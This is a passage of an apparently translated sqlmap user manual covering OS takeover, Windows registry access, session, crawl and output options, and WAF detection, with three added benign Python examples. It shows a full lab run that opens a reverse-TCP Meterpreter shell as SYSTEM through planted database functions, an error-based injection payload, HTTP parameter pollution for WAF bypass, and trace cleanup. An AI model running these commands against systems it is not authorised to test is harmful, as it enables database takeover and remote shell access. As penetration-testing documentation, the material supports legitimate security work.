- Upload and run Metasploit's "stand-alone payload stager" via sqlmap's own user-defined function (sys_exec() on MySQL and PostgreSQL, xp_cmdshell() on Microsoft SQL Server). Parameter: --os-pwn.
- Exploit the remote code execution vulnerability MS08-068. The attacker's machine must run Metasploit's smb_relay to listen for the connection from the target. Requires sqlmap to run as root on Linux/Unix and the target DBMS to run as Administrator on Windows. Parameter: --os-smbrelay.
- On Microsoft SQL Server 2000 and 2005, execute Metasploit's shellcode in memory via the heap-based buffer overflow in the sp_replwritetovarbin stored procedure (MS09-004). sqlmap has its own Data Execution Prevention bypass to exploit the vulnerability successfully, but still needs Metasploit to generate the shellcode that runs once exploitation succeeds. Parameter: --os-bof.
python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/iis/get_int_55.aspx?id=1" --os-pwn --msf-path /software/metasploit
[...]
[hh:mm:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:31] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>
[hh:mm:32] [INFO] testing if current user is DBA
[hh:mm:32] [INFO] fetching current user
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
>
[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist
[hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:33] [INFO] detecting back-end DBMS version from its banner
[hh:mm:33] [INFO] retrieving MySQL base directory absolute path
[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database und
erlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on
all ports
between the specified and 65535
[3] Bind TCP: Listen on the database host for a connection
>
which is the local address? [192.168.136.1]
which local port number do you want to use? [60641]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
=[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 674 exploits - 351 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12272 updated 4 days ago (2011.04.07)
PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => thread
LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11 hh:mm:52 +0100 2011
meterpreter > Loading extension espia...success.
meterpreter > Loading extension incognito...success.
meterpreter > [-] The 'priv' extension has already been loaded.
meterpreter > Loading extension sniffer...success.
meterpreter > System Language : en_US
OS : Windows .NET Server (Build 3790, Service Pack 2).
Computer : W2K3R2
Architecture : x86
Meterpreter : x86/win32
meterpreter > Server username: NT AUTHORITY\SYSTEM
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
Intel(R) PRO/1000 MT Network Connection
Hardware MAC: 00:0c:29:fc:79:39
IP Address : 192.168.136.129
Netmask : 255.255.255.0
meterpreter > exit
[*] Meterpreter session 1 closed. Reason: User exit
On Windows, MySQL runs as SYSTEM by default, whereas PostgreSQL runs as the low-privileged postgres user on both Windows and Linux. SQL Server 2000 runs as SYSTEM by default, while SQL Server 2005 through 2008 mostly run as NETWORK SERVICE and occasionally as LOCAL SERVICE.
--priv-esc runs Metasploit's getsystem command to attempt privilege escalation.
XVII. Windows registry access
The Windows registry can be manipulated when all of the following hold:
- the target DBMS runs on Windows
- the target DBMS is MySQL, PostgreSQL or Microsoft SQL Server
- stacked queries are supported
- the current DBMS user has sufficient privileges
1. Reading a Windows registry key value
Parameter: --reg-read
2. Writing a Windows registry key value
Parameter: --reg-add
3. Deleting a Windows registry key value
Parameter: --reg-del
4. Auxiliary options
Parameters: --reg-key, --reg-value, --reg-data and --reg-type
Used appropriately, these options let you add or modify a Windows registry key value from the command line instead of answering sqlmap's prompts at run time.
- --reg-key: path of the registry key
- --reg-value: name of the value under the key
- --reg-data: data of the value
- --reg-type: data type of the value
python sqlmap.py -u http://192.168.136.129/sqlmap/pgsql/get_int.aspx?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
XVIII. General options
1. Loading a sqlmap session from a SQLite file
Parameter: -s
sqlmap automatically creates a persistent session SQLite file for every target, kept under a fixed directory (e.g. ~/.sqlmap/output/), holding all the data needed to resume the session. Use this option to specify the SQLite file explicitly, for example to store data from several targets in one file.
2. Logging HTTP(S) traffic to a file
Parameter: -t
This option takes a file path; HTTP(S) requests and responses are written to the file as text. Such a log is very useful for debugging.
3. Non-interactive mode
Parameter: --batch
With this option sqlmap runs non-interactively and uses the default answer for every prompt.
4. Setting the character encoding
Parameter: --charset
To decode data correctly, sqlmap uses the information provided by the web server (such as the character set in the HTTP headers) or the third-party chardet library to detect the encoding heuristically.
The encoding can be forced with --charset, e.g. "--charset=GBK".
5. Crawling the target site from the target URL
Parameter: --crawl
sqlmap can crawl the target site starting from the target URL and collect potentially vulnerable URLs. The option takes a crawl depth, measured relative to the starting URL. Crawling ends only after every newly found link has been visited recursively. Combining this option with --delay is recommended.
The following example targets MySQL:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/" --batch --crawl=3
Partial output:
[xx:xx:53] [INFO] starting crawler
[xx:xx:53] [INFO] searching for links with depth 1
[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while
[xx:xx:53] [INFO] searching for links with depth 2
[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:00] [INFO] 42/56 links visited (75%)
Parameter: --crawl-exclude
This option takes a regular expression; URLs matching it are not crawled. For example, "--crawl-exclude=logout" skips every URL containing the string "logout".
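How the crawl depth and the exclusion regex interact is easiest to see on a small site map. The following is an added example written for this page, not sqlmap's crawler: a breadth-first crawl that counts hops from the start URL, stays on the start host, drops links matching an exclude regex, and reports the discovered URLs that carry a query string. The site (SAMPLE_SITE) is a constructed dict of url to body, so nothing is fetched over the network; plug in a real fetch callable to run it against a test instance you own.

```python
import re
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LinkExtractor(HTMLParser):
    """Collect href attributes of <a> tags."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def extract_links(page_url, html):
    """Absolute URLs of all links in html, resolved against page_url."""
    parser = _LinkExtractor()
    parser.feed(html)
    return [urljoin(page_url, href) for href in parser.hrefs]


def crawl(start, fetch, depth, exclude=None):
    """Breadth-first crawl from `start`, following same-host links up to
    `depth` hops away.  `fetch(url)` returns the page body or None.
    `exclude` is a regex: matching URLs are neither fetched nor expanded
    (the --crawl-exclude rule).  Returns, sorted, the discovered URLs that
    carry a query string, i.e. the candidate injection-test targets."""
    skip = re.compile(exclude) if exclude else None
    host = urlsplit(start).netloc
    seen = {start}
    queue = deque([(start, 0)])
    while queue:
        url, hops = queue.popleft()
        body = fetch(url)
        if body is None or hops >= depth:      # leaf: do not expand further
            continue
        for link in extract_links(url, body):
            if urlsplit(link).netloc != host:  # stay on the target site
                continue
            if skip and skip.search(link):      # --crawl-exclude
                continue
            if link not in seen:
                seen.add(link)
                queue.append((link, hops + 1))
    return sorted(u for u in seen if urlsplit(u).query)


# Constructed sample site: url -> html body (offline stand-in for fetch)
SAMPLE_SITE = {
    "http://app.example/": '<a href="/list.php?cat=1">list</a> '
                           '<a href="/about.html">about</a> '
                           '<a href="/logout.php">logout</a>',
    "http://app.example/list.php?cat=1": '<a href="/item.php?id=7">item</a> '
                                         '<a href="/list.php?cat=2">next</a>',
    "http://app.example/list.php?cat=2": '<a href="/item.php?id=8">item</a>',
    "http://app.example/item.php?id=7": '<a href="/deep.php?x=1">more</a>',
    "http://app.example/item.php?id=8": "",
    "http://app.example/about.html": '<a href="http://other.example/?q=1">ext</a>',
    "http://app.example/logout.php": '<a href="/admin.php?do=1">admin</a>',
    "http://app.example/deep.php?x=1": "",
    "http://app.example/admin.php?do=1": "",
}

if __name__ == "__main__":
    for target in crawl("http://app.example/", SAMPLE_SITE.get, depth=2, exclude="logout"):
        print(target)
```

Note that the exclude regex is applied before a link is queued, so anything reachable only through an excluded page (here admin.php behind logout.php) is never seen either; that is the behaviour to expect when excluding a logout link to keep a session alive.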
6. Setting the delimiter of CSV output
Parameter: --csv-del
When data is written to CSV files (--dump-format=CSV) the default delimiter is ",". This option sets a different one, e.g. --csv-del=";".
7. DBMS authentication credentials
Parameter: --dbms-cred
Sometimes an action fails because the current DBMS user's privileges are too low. This option supplies admin credentials, and sqlmap re-runs the failed parts under a "run as" mechanism (such as OPENROWSET on Microsoft SQL Server) as that admin user. Naturally, you must know the admin credentials.
8. Dump output format
Parameter: --dump-format
sqlmap has three output formats for dumped data: CSV, HTML and SQLITE. CSV is the default: each table goes into its own text file, one record per line, comma-separated (or with the delimiter given by --csv-del). With HTML, all data goes into one HTML file, one HTML table per database table. With SQLITE, all data goes into one SQLite file whose tables have the same names and structure as the originals.
9. Estimated time of arrival
Parameter: --eta
This option shows the estimated completion time. The following example is a boolean-based blind injection against Oracle:
python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int_bool.php?id=1" -b --eta
Partial output:
[hh:mm:01] [INFO] the back-end DBMS is Oracle
[hh:mm:01] [INFO] fetching banner
[hh:mm:01] [INFO] retrieving the length of query output
[hh:mm:01] [INFO] retrieved: 64
17% [========> ] 11/64
Then:
100% [===================================================] 64/64
[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:
'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
As you can see, sqlmap first computes the length of the query output, then estimates the completion time, and finally shows a percentage progress bar with a count of the data retrieved so far.
10. Flushing the session file
Parameter: --flush-session
This option flushes the session file to avoid problems that sqlmap's default caching may cause. Use it only if you really understand what the session file holds. Deleting the session file by hand is the alternative.
11. Parsing and testing form input fields
Parameter: --forms
Besides -r and --data, form data can be tested for injection points with --forms.
With --forms and -u together, sqlmap parses the forms in the page returned by the target URL (the one given with -u) and tests those forms for injection points instead of testing the target URL itself.
12. Ignoring query results stored in the session file
Parameter: --fresh-queries
This option ignores the query results stored in the session file and re-runs the queries.
13. Using the HEX function on retrieved data
Parameter: --hex
Non-ASCII data is easily corrupted in transit; the hex function makes the target DBMS return its data in hexadecimal.
The following example targets PostgreSQL:
python sqlmap.py -u "http://192.168.48.130/sqlmap/pgsql/get_int.php?id=1" --banner --hex -v 3 --parse-errors
Partial output:
[xx:xx:14] [INFO] fetching banner
[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR
(58))||(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)
[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ERROR: invalid input syntax for type numeric: ":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c656420627920474343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:" in <b>/var/www/sqlmap/libs/pgsql.inc.php</b> on line <b>35</b>'
[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by
GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2
14. Setting the output directory
Parameter: --output-dir
sqlmap stores session and result files under the output subdirectory by default; this option sets a different directory, e.g. "--output-dir=/tmp".
15. Parsing DBMS error messages from responses
Parameter: --parse-errors
If the web application is configured in debug mode, it will likely show SQL error messages in its HTTP responses. These messages help explain why an action failed; a failure due to insufficient privileges, for example, produces a message like "Access denied for user".
The following example targets Microsoft SQL Server:
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --parse-errors
Partial output:
[xx:xx:17] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 10 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 6 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] parsed error message: 'Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 4 is out of range of the number of items in the select list.
<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>'
[xx:xx:17] [INFO] target URL appears to have 3 columns in query
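What --parse-errors reads back is information the application should not have sent. The following is an added example written for this page, not sqlmap code: a scanner that runs over the HTTP response bodies of your own test instance and flags pages whose body contains DBMS error text. The signature table is seeded with the three error strings quoted in this tutorial (the ODBC/SQL Server driver banner, PostgreSQL's pg_query() failure, MySQL's "Access denied for user"); the sample responses are constructed.

```python
import re

# Error-text signatures, taken from the messages quoted in this tutorial.
# Extend the table for your own stack; the keys are the names reported.
DBMS_ERROR_SIGNATURES = {
    "Microsoft SQL Server": re.compile(
        r"Microsoft OLE DB Provider for ODBC Drivers"
        r"|\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\]"),
    "PostgreSQL": re.compile(
        r"pg_query\(\).*?Query failed: ERROR:"
        r"|invalid input syntax for type \w+", re.S),
    "MySQL": re.compile(
        r"Access denied for user"
        r"|You have an error in your SQL syntax"),
}


def find_dbms_errors(body):
    """Names of the DBMSs whose error text appears in one response body."""
    return [dbms for dbms, rx in DBMS_ERROR_SIGNATURES.items() if rx.search(body)]


def scan_responses(responses):
    """responses: {url: body}.  Returns {url: [dbms, ...]} for the leaky
    pages only; an empty dict means no response exposed a DBMS error."""
    report = {}
    for url, body in responses.items():
        hits = find_dbms_errors(body)
        if hits:
            report[url] = hits
    return report


def leaky_urls(responses):
    """Sorted list of URLs that leak DBMS errors (convenient for a report)."""
    return sorted(scan_responses(responses))


# Constructed sample responses: the first two carry error text modelled on
# the --parse-errors output above, the last two are clean pages.
SAMPLE_RESPONSES = {
    "/get_int.asp?id=1": (
        "Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)\n"
        "[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position "
        "number 10 is out of range of the number of items in the select list.\n"
        "<b>/sqlmap/mssql/iis/get_int.asp, line 27</b>"),
    "/get_int.php?id=1": (
        "<b>Warning</b>: pg_query() [<a href='function.pg-query'>"
        "function.pg-query</a>]: Query failed: ERROR: invalid input syntax "
        "for type numeric: \":vtj:506f7374:nxb:\" in <b>pgsql.inc.php</b>"),
    "/login.php": "<html><body>Invalid username or password.</body></html>",
    "/item.php?id=7": "<html><body><h1>Item 7</h1></body></html>",
}

if __name__ == "__main__":
    for url, dbms in scan_responses(SAMPLE_RESPONSES).items():
        print(f"{url}: leaks {', '.join(dbms)} error text")
```

A hit means the page returns raw driver output instead of a generic error; the fix is on the application side (log the detail, return a fixed message), after which the scan should come back empty.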
16. Setting the pivot column
Parameter: --pivot-column
Sometimes (e.g. on Microsoft SQL Server, Sybase and SAP MaxDB) table records cannot be dumped directly with an offset m,n because the DBMS lacks such a mechanism. In that case sqlmap picks the most suitable pivot column (the one with the most distinct values) and later uses its values to retrieve the other columns.
If automatic selection fails, set the pivot column manually with this option, e.g. "--pivot-column=id".
17. Saving options to a configuration file
Parameter: --save
This option saves sqlmap's command-line options to a configuration file, which can be edited and loaded with -c. The file is in INI format.
18. Updating sqlmap
Parameter: --update
This option updates sqlmap, which obviously requires Internet access. If it fails, run "git pull" in the sqlmap installation directory. On Windows without a git command, a git client such as SmartGit can be used.
In fact --update and "git pull" update sqlmap the same way: both fetch the latest source code from the git repository.
Updating sqlmap before reporting a bug is strongly recommended.
XIX. Miscellaneous
1. Using abbreviations
Parameter: -z
Some option combinations are used very often, such as "--batch --random-agent --ignore-proxy --technique=BEU". Typing such a long string is unwieldy, so sqlmap offers an abbreviated form to shorten the command line.
With -z, each option can be written as just its first few letters, e.g. "--batch" becomes "bat". The rule is that the abbreviation must be unambiguous, i.e. match exactly one option. Options are separated by commas. For example:
python sqlmap.py --batch --random-agent --ignore-proxy --technique=BEU -u "www.target.com/vuln.php?id=1"
can be abbreviated as:
python sqlmap.py -z "bat,randoma,ign,tec=BEU" -u "www.target.com/vuln.php?id=1"
Another example:
python sqlmap.py --ignore-proxy --flush-session --technique=U --dump -D testdb -T users -u "www.target.com/vuln.php?id=1"
can be abbreviated as:
python sqlmap.py -z "ign,flu,bat,tec=U,dump,D=testdb,T=users" -u "www.target.com/vuln.php?id=1"
2. Alerting when an injection point is found
Parameter: --alert
This option raises an alert when a new injection point is found; it takes the command used to raise the alert, e.g.:
python sqlmap.py -r data.txt --alert "notify-send '找到漏洞了'"
Partial output:
[18:59:36] [INFO] GET parameter 'couno' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)' injectable (with --not-string="001")
[18:59:36] [INFO] executing alerting shell command(s) ('notify-send '找到漏洞了'')
The alert command in the example is Ubuntu's notify-send.
3. Preset answers to prompts
Parameter: --answers
With --batch every prompt gets its default answer. To run non-interactively while answering specific prompts differently, use --answers; multiple answers are separated by commas. For example:
python sqlmap.py -u "http://192.168.22.128/sqlmap/mysql/get_int.php?id=1" --technique=E --answers="extending=N" --batch
Partial output:
[xx:xx:56] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[xx:xx:56] [INFO] do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] N
4. Beeping when an injection point is found
Parameter: --beep
This option makes sqlmap beep when an injection point is found. It is especially handy when testing many sites from a log file with -m.
5. Cleaning up sqlmap's temporary tables and user-defined functions
Parameter: --cleanup
Using this option after testing is strongly recommended: sqlmap removes the temporary tables and user-defined functions it created, clearing as many traces of the intrusion as possible from the DBMS and the file system.
6. Checking dependencies
Parameter: --dependencies
Some sqlmap features depend on third-party libraries and abort with an error when they are missing. This option checks whether the required third-party libraries are installed, e.g.:
python sqlmap.py --dependencies
Partial output:
[*] starting at 19:16:05
[19:16:05] [WARNING] sqlmap requires 'python-kinterbasdb' third-party library in order to directly connect to the DBMS 'Firebird'. Download from http://kinterbasdb.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Sybase'. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires 'python cx_Oracle' third-party library in order to directly connect to the DBMS 'Oracle'. Download from http://cx-oracle.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires 'python-psycopg2' third-party library in order to directly connect to the DBMS 'PostgreSQL'. Download from http://initd.org/psycopg/
[19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'IBM DB2'. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires 'python jaydebeapi & python-jpype' third-party library in order to directly connect to the DBMS 'HSQLDB'. Download from https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/
[19:16:05] [WARNING] sqlmap requires 'python ibm-db' third-party library in order to directly connect to the DBMS 'Informix'. Download from https://github.com/ibmdb/python-ibmdb
[19:16:05] [WARNING] sqlmap requires 'python-pyodbc' third-party library in order to directly connect to the DBMS 'Microsoft Access'. Download from https://github.com/mkleehammer/pyodbc
[19:16:05] [WARNING] sqlmap requires 'python-pymssql' third-party library in order to directly connect to the DBMS 'Microsoft SQL Server'. Download from https://github.com/pymssql/pymssql
[19:16:05] [WARNING] sqlmap requires 'python-impacket' third-party library for out-of-band takeover feature. Download from http://code.google.com/p/impacket/
[19:16:05] [WARNING] sqlmap requires 'python-ntlm' third-party library if you plan to attack a web application behind NTLM authentication. Download from http://code.google.com/p/python-ntlm/
[19:16:05] [WARNING] sqlmap requires 'websocket-client' third-party library if you plan to attack a web application using WebSocket. Download from https://pypi.python.org/pypi/websocket-client/
[*] shutting down at 19:16:05
As you can see, what I am missing are mainly the third-party libraries for direct database connections.
7. Disabling colored output
Parameter: --disable-coloring
8. Using a specific page of Google dork results
Parameter: --gpage
With -g, the first 100 Google dork results are tested by default. Combined with this option, a specific page of the Google dork results can be used.
9. Using HTTP parameter pollution
Parameter: --hpp
HTTP parameter pollution is a technique for bypassing WAF/IPS/IDS protection; see the linked reference for details. It is especially effective against ASP/IIS and ASP.NET/IIS platforms. If the target is suspected to be behind a WAF/IPS/IDS, try this option.
10. Thorough WAF/IPS/IDS detection
Parameter: --identify-waf
sqlmap can identify WAF/IPS/IDS products so that the user can react accordingly (e.g. by adding --tamper). sqlmap currently detects more than 30 different WAF/IPS/IDS products, such as Airlock and Barracuda WAF. The detection scripts are in the waf directory of the installation.
The following example targets MySQL behind a ModSecurity WAF:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --identify-waf -v 3
Partial output:
[xx:xx:23] [INFO] testing connection to the target URL
[xx:xx:23] [INFO] heuristics detected web page charset 'ascii'
[xx:xx:23] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'USP Secure Entry Server (United Security Providers)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'BinarySEC Web Application Firewall (BinarySEC)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetContinuum Web Application Firewall (NetContinuum/Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Hyperguard Web Application Firewall (art of defence Inc.)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
[xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
[xx:xx:23] [DEBUG] page not found (404)
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
[xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
[xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
Parameter: --skip-waf
By default sqlmap sends a dummy SQL injection payload to probe whether the target is protected. If this causes any problem, --skip-waf disables the probe.
11. Imitating a smartphone
Parameter: --mobile
Some sites return different content to smartphones and desktop browsers. To test such a site's mobile pages you can set a smartphone User-Agent, or more simply use this option: sqlmap then asks which popular phone to imitate, e.g.:
$ python sqlmap.py -u "http://www.target.com/vuln.php?id=1" --mobile
[...]
which smartphone do you want sqlmap to imitate through HTTP User-Agent header?
[1] Apple iPhone 4s (default)
[2] BlackBerry 9900
[3] Google Nexus 7
[4] HP iPAQ 6365
[5] HTC Sensation
[6] Nokia N97
[7] Samsung Galaxy S
> 1
[...]
12. Offline mode (using session data only)
Parameter: --offline
With this option sqlmap tests using only previously stored session data and sends no packets to the target.
13. Showing page rank for Google dork results
Parameter: --page-rank
Used with -g, this makes sqlmap issue extra requests to Google and show the page rank of each result.
14. Safely removing all content from the output directory
Parameter: --purge-output
Use this option to securely delete everything in the output directory. Secure deletion does not just delete: before deleting, the existing data is overwritten with random data, and even file and directory names are renamed to overwrite the old names; only when all overwriting is done are the files deleted. Afterwards the output directory is empty. For example:
python sqlmap.py --purge-output -v 3
Partial output:
[*] starting at 19:51:36
[19:51:36] [DEBUG] cleaning up configuration parameters
[19:51:36] [INFO] purging content of directory '/home/werner/.sqlmap/output'...
[19:51:36] [DEBUG] changing file attributes
[19:51:36] [DEBUG] writing random data to files
[19:51:36] [DEBUG] truncating files
[19:51:36] [DEBUG] renaming filenames to random values
[19:51:36] [DEBUG] renaming directory names to random values
[19:51:36] [DEBUG] deleting the whole directory tree
[*] shutting down at 19:51:36
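The debug lines above list the purge steps in order; the following is an added example written for this page, not sqlmap's purge code, implementing that same sequence (attributes, random overwrite, truncate, random file names, random directory names, tree removal) over a constructed stand-in for the output directory. The helper make_sample_output_dir() builds that stand-in in a temporary location so the example can be run safely.

```python
import os
import secrets
import shutil
import tempfile


def purge_output(root):
    """Securely remove everything under `root`, mirroring the steps that
    --purge-output logs: change attributes, overwrite with random data,
    truncate, rename files and directories to random names, delete the
    tree.  Returns the number of files wiped (0 if root does not exist)."""
    if not os.path.isdir(root):
        return 0
    wiped = 0
    # bottom-up, so a directory's children are handled before the directory
    for dirpath, dirnames, filenames in os.walk(root, topdown=False):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):                  # never write through a symlink
                os.unlink(path)
                continue
            os.chmod(path, 0o600)                     # changing file attributes
            size = os.path.getsize(path)
            with open(path, "r+b") as fh:             # writing random data to files
                fh.write(os.urandom(size))
                fh.flush()
                os.fsync(fh.fileno())
            with open(path, "wb"):                    # truncating files
                pass
            os.rename(path, os.path.join(dirpath, secrets.token_hex(8)))  # renaming filenames
            wiped += 1
        for name in dirnames:                         # renaming directory names
            src = os.path.join(dirpath, name)
            if os.path.islink(src):
                os.unlink(src)
            else:
                os.rename(src, os.path.join(dirpath, secrets.token_hex(8)))
    shutil.rmtree(root)                               # deleting the whole directory tree
    return wiped


def make_sample_output_dir():
    """Constructed stand-in for ~/.sqlmap/output: one target directory with
    a CSV dump and a log file.  Returns its path; the caller purges it."""
    root = tempfile.mkdtemp(prefix="sqlmap-output-")
    dump_dir = os.path.join(root, "192.0.2.10", "dump", "testdb")
    os.makedirs(dump_dir)
    with open(os.path.join(dump_dir, "users.csv"), "w") as fh:
        fh.write("id,name\n1,luther\n2,fluffy\n")
    with open(os.path.join(root, "192.0.2.10", "log"), "w") as fh:
        fh.write("[INFO] constructed log entry\n")
    return root


def demo():
    """Build the sample tree, purge it, report (files wiped, root still exists)."""
    root = make_sample_output_dir()
    wiped = purge_output(root)
    return wiped, os.path.exists(root)


if __name__ == "__main__":
    print(demo())
```

The overwrite step is only meaningful on storage that rewrites in place; on SSDs and copy-on-write file systems the old blocks may survive, so full-disk encryption remains the reliable control for dumped data at rest.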
15. Smart scan
Parameter: --smart
When many URLs are to be tested (e.g. with -m) and the goal is to find some injection points quickly even at the cost of missing others, --smart performs a positive heuristic scan: only parameters that make the DBMS raise an error are tested further, and the remaining URLs are skipped. For example:
$ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
[...]
[xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
[xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
[xx:xx:14] [INFO] skipping GET parameter 'ca'
[xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
[xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
[xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
